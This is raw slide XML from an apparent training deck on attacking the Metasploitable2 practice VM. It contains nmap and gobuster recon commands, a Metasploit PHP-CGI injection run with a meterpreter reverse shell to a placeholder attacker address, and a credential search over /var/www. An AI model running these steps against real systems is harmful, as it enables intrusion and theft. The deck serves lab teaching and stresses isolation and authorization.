              <a:t>web app &amp; server flaws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59A383-0866-4407-8C26-55CD13DCF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t>12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63E0F1-B897-4223-A3A2-2C081255D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Metasploitable2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F6BAA2-E4F1-4057-8037-B984D995D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06-10-2025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E95CE40-E897-40F4-A875-FD2DB2606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967" y="0"/>
            <a:ext cx="3508726" cy="4124432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2137BC73-D0C6-4C95-9465-2CE035BDB7E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4313363" y="2019708"/>
            <a:ext cx="6793799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Why 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shows how web misconfigurations or vulnerable PHP/Apache lead to info disclosure or remote code execution.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Recon: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nmap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-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Pn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-p 80 -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sV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&lt;TARGET_IP&gt; -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web-recon.txt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Quick checks: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browse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http://&lt;TARGET_IP&gt;/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(inspect source);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curl -I http://&lt;TARGET_IP&gt;:80/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(headers)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Content discovery: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gobuster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dir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-u http://&lt;TARGET_IP&gt;/ -w /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usr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/share/wordlists/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dirb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/common.txt -t 30 -o gobuster-web.txt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Exploit (example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msf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flow):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Arial Unicode MS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use exploit/multi/http/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php_cgi_arg_injection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set RHOSTS &lt;TARGET_IP&gt; set RPORT 80 set LHOST &lt;ATTACKER_IP&gt; set LPORT 4444 set PAYLOAD php/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meterpreter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/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reverse_tcp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exploit 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Post-exploit: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grep -R "password" /var/www -n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→ check configs, enumerate further.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manual inspection (browsing &amp; reading source) often finds what automated tools miss.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10335273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Placeholder 19" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9CF847D-0BA8-4D40-B95D-DAC8A415A56D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953F70E9-6111-446A-BD49-B6A996FA0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Post-Exploitation Checklist &amp; Cleanup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3221DE2-465E-4B89-BDBB-17EC727932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Post-exploitation (quick checks)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EB9F42-DBAC-4200-A2A6-96F4D943E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32CBFD-8EB3-4D94-8FDF-C4198EF11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CC7CD0-CDEF-499B-929F-253562EB8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MM.DD.20XX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F7C10959-0A42-4430-B5A3-45762A723121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6894591" y="2899283"/>
            <a:ext cx="4741597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Identify user &amp; privileges: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whoami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id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System info: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uname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-a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cat /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etc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/issue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Network info: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ip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netstat -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tunlp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Search for credentials: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grep -R "password" /var/www -n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Keep it non-destructive: avoid persistent backdoors; use snapshots to restore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BB6B61-DA3D-4B5E-A067-2BF354867E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803602" y="4165830"/>
            <a:ext cx="3881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Cleanup &amp; safety</a:t>
            </a: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CD31C343-117C-49E2-87FA-E378E7E8C6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4591" y="4477430"/>
            <a:ext cx="4653294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Kill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msf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sessions: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 Unicode MS"/>
              </a:rPr>
              <a:t>sessions -l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</a:rPr>
              <a:t> →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 Unicode MS"/>
              </a:rPr>
              <a:t>sessions -k &lt;id&gt;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2"/>
              </a:solidFill>
              <a:effectLst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Stop listeners / services started on Kali (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Ctrl+C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or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systemctl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Revert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Metasploitable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snapshot to clear changes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Never expose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Metasploitable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</a:rPr>
              <a:t> to production or the internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022391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4F6FF42-70E3-4A7F-B5D8-2928FCB71A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846389"/>
            <a:ext cx="9144000" cy="1165221"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THANK  YOUU..!!!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269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B26A0-76B0-4D92-8A3B-F4FB7FCBB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wht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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0184F8-7D3E-4F39-85DA-53F65AF618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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 is like a driving-school car with dual controls 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BC30F8-1890-4494-869A-DCD11E9F5FF4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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 is an intentionally vulnerable virtual machine designed for security training and testing; it contains outdated software and misconfigurations so students and researchers can safely practice scanning, exploitation, and defensive techniques in an isolated lab.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture Placeholder 19" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61169563-0C6E-483D-91B6-7AB8952A8FA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/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E91C663-2D66-4255-91B4-906F720EB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0B83D80-B29B-48B9-9B34-76AD9399E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Metasploitable2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EC88EDC-DE1B-4E22-AB2A-B461D5C81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06-10-2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2905111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06C22-D0C4-4D8E-86F7-1A902F1CA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Safety &amp; Ethics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture Placeholder 17" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9DAA9F-5926-4BC1-8F7B-06E0B1C2F013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5328BF-D489-4F39-BA27-5AD38E911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7B5262-30A5-4063-A21E-56FCACC40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Metasploitable2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F813B4-2C3F-45B0-A38D-A3FE79E6D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06-10-2025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54F2EB1A-7420-465B-A163-49433E86F8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="803276" y="3392267"/>
            <a:ext cx="4862590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Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Isolate the lab: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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> run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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in NAT network or Host‑Only networks and use snapshots.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Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only test with permission: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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> experiments are allowed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Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>only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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on intentionally vulnerable VMs or authorized targets.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Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid persistence or harm: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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> do non‑destructive demos; don't install permanent backdoors or expose the VM to the internet.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Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Document &amp; learn responsibly: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egoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Emoji" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> log actions, share findings constructively, and focus on remediation as well as exploitation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2149445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Placeholder 19" descr="Abstract background&#10;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3330B498-1497-4DA8-99F4-8F8159B24FF9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FF93F71D-1663-42FA-A91E-FA23F03F0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 Setup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62CA978-7F10-45ED-A5E7-73BCC796D2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Emphasize isolated environment and snapshots for safety and repeatable demos.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4C7D40-6709-40D4-B0FB-9D6311AF4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1DB817-586B-493A-922D-54010C888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Metasploitable2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6AB769-C08B-4A71-BEE7-D771D2743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06-10-2025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DE61A342-0A68-47F3-AF2B-04CD4C4C85A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6957344" y="2929104"/>
            <a:ext cx="4179809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VM Platform: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VirtualBox (32-bit Linux VM)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VM Image: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Metasploitable2.vmdk (pre-configured vulnerable OS)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Memory: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512–1024 MB recommended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Network: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NAT network (isolated, secure)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Snapshots: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Take pre-demo snapshots to restore clean state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Attacker VM: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Kali Linux (or similar) on same NAT network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="764296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CB059-9E3B-4C24-8E61-717292C29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Finding the Target IP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6139D5-668D-4A3D-B6B6-F71EC385C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4160" y="3144457"/>
            <a:ext cx="4443165" cy="569085"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture Placeholder 12" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7AE772-6658-4E84-8EAA-F33DEF1CDE4F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9E0CB5-2F64-4439-AFE9-1BB3ACE6F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FF8DFC-D37E-4FE9-81F0-77C68D469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Metasploitable2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396AE-BE46-43FB-B4E7-224D2AF39F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031506" y="5878720"/>
            <a:ext cx="1322294" cy="298800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>06-10-2025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35A374AF-235F-4CB6-BE7E-841F7898583D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="803276" y="3428999"/>
            <a:ext cx="5292724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Method A — On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Metasploitable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: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Log in to the VM and run ifconfig -a or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ip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a → note the interface IP &amp; subnet.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Method B — From Kali (network discovery):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Quick host discovery (ping sweep):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nmap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-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sn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10.0.2.0/24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Full service check (if host found):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nmap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-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Pn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-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sV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&lt;TARGET_IP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Notes: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-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sn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performs host discovery (formerly -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sP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); -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Pn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skips host discovery (useful if ICMP is filtered).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If attacker &amp; victim share a /24, their IPs share the first three octets (e.g., 10.0.2.*).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3766803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E18C9-A34F-49C5-973E-6760D1EF1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Demo Structure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture Placeholder 21" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0342E5A4-E598-4185-B93F-5814F00C201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682496"/>
            <a:ext cx="12191999" cy="3493008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79F2E6-BA14-4C8A-ABD2-DF50609348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Service Walkthrough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D9EA8-AA17-47B2-A4C4-B60DC7C7D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7D25D-51F0-4AAA-86C5-F3584C0E8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Metasploitable2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8CF653-A1E7-473E-A717-8659C5E45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06-10-2025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C8F5429E-051D-484E-BC06-4CB64A22D6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5693" y="2459171"/>
            <a:ext cx="4368025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Snapshot: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take a snapshot (e.g., pre-ftp, pre-telnet)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Recon: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run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nmap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Pn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sV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and show service + version output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Enumeration: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interactive/automated checks (ftp/telnet/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ssh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login, curl,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gobuster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Exploit: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run Metasploit or manual exploit — explain in plain terms what it does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Post‑exploit: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quick verification commands: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whoami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, id,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uname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-a,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ip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a, ls -la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Cleanup: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 exit shells, sessions -l / sessions -k &lt;id&gt;, revert snapshot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4080312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FFA9230-37E2-4CEB-A3E5-B704CE273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Recon Port &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service Enumeration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4CE41FD-E209-4A5A-A2E8-544E35CFA6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roadmap for selecting exploits.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9BE0DA3-3A03-418B-B7CF-0D4107499B9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dirty="0"/>
              <a:t>A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E74A44B-1AAF-44D0-A426-104890F03E29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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick full TCP service scan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CC46A248-3DD2-4083-A410-269D3C38BC7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B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C2591E4E-87B2-4D64-B582-FBD4968920C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="29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Targeted ports Scan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02433E8-0DB5-41D8-8B35-D76C17922FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="27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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p 21,22,23,80 &lt;TARGET_IP&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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A0DE6855-935C-4D9C-A6CA-A30ED4BC73A2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/>
              <a:t>C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BECA94-5E25-4E6D-A58C-7792A89CED7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="32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What,Why,When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CD95F8-281D-4A11-99F2-9795C5264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F07EF2-7D34-4156-A053-F39C57360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Metasploitable2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3AE2A4-3957-4B28-BF08-92D47AFB3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06-10-2025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BDC861B0-730D-4706-9DCB-972909686B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1226927" y="4292421"/>
            <a:ext cx="2608791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dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p- &lt;TARGET_IP&gt;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9544039B-EF9D-4672-A22F-C9FEEEB5DEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8271050" y="4196377"/>
            <a:ext cx="3491571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What it returns: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PORT STATE SERVICE VERSION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</a:rPr>
              <a:t> (e.g.,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22/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tcp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open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ssh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OpenSSH 4.7p1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</a:rPr>
              <a:t>)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Why versions matter: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version strings point to known vulnerabilities or appropriate exploits/modules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When to use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-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Pn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</a:rPr>
              <a:t>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skip host discovery if ICMP/ping is blocked in VM networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33101767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itle 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E72CC338-4598-4AF3-B140-D7F632D20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317" y="707529"/>
            <a:ext cx="4959833" cy="569086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focused Service Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text Placeholder 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1411656D-4971-4CC0-9065-8DA32BB874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demos for each service — Recon → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> → Exploit → Post-exploit → Cleanup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87FAD12-8FEF-41B8-B478-8793FF9B485B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port 21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture Placeholder 6" descr="Globe icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610C6214-BE35-4ED8-9EE7-7252A6039583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446" r="1446"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7719417" y="4409320"/>
            <a:ext cx="640080" cy="658368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8E5EEAD-1427-4576-B8F8-C485CAE758A4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Demonstrates a legacy backdoor that can spawn a remote shell via a crafted username, highlighting the danger of unpatched services.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C214C1BB-D845-4DB6-B4FC-B7AD5F5E0C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telnet port 23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture Placeholder 11" descr="Cubes icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92015B7B-96EB-42A1-A654-5DE5377A52C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="2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446" r="1446"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090460" y="4402984"/>
            <a:ext cx="640080" cy="658368"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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9B92F0C-3A1D-438E-B581-C1A63389DAF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="20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Shows how Telnet sends credentials in cleartext, enabling easy credential capture and session interception.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457CA9C-196E-494C-85C7-9B4861053912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port 22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture Placeholder 17" descr="Microprocessor icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2714DCC9-F1D9-4D7B-9452-B6DF9693F667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329" r="1329"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090460" y="3291840"/>
            <a:ext cx="640080" cy="658368"/>
          </a:xfr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CE2783CF-764B-4358-9D88-FAC1CFEBE203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="17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Illustrates credential brute-forcing and problems connecting to old OpenSSH host-keys that require legacy algorithm flags.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0D9ADD0F-E05E-4B0E-9D9D-545FD755D7AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="25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 port 80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture Placeholder 20" descr="Atom icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E2A99D-9A76-4170-84C5-E8E895DEA558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329" r="1329"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7719417" y="3291840"/>
            <a:ext cx="640080" cy="658368"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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46EA4E1F-EF09-44AB-9483-363CF418AA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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Covers web server/app vulnerabilities (e.g., PHP-CGI argument injection) that can lead to information disclosure or remote code execution.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581DBA-A3EE-4E75-90A6-DC25DF9DA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109C3A-84E8-4719-8AE7-A66B8CA97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Metasploitable2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2EEAA2-E066-4E86-A51B-FAC333319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06-10-2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4006072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AA634A5-7FE6-42E8-939A-FEBD826008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FTP  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4 Backdoor Port 21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7F2EF20-4914-4F8B-9D4E-F7DF9977D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0" y="1625821"/>
            <a:ext cx="5292725" cy="740861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick demo showing how a single backdoor yields a remote shell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0F84A1-DCA9-4894-82EA-A83237ACA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581BC7-E183-40DB-AC97-C19EA4EB8894}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9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5E9DB8-C5FF-491C-87D4-2A6ED2915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Metasploitable2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C52B98C-5C1E-46B1-B54D-F830C6227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06-10-2025</a:t>
            </a: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A2D31B4F-802F-4290-A894-D0346D1D6F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
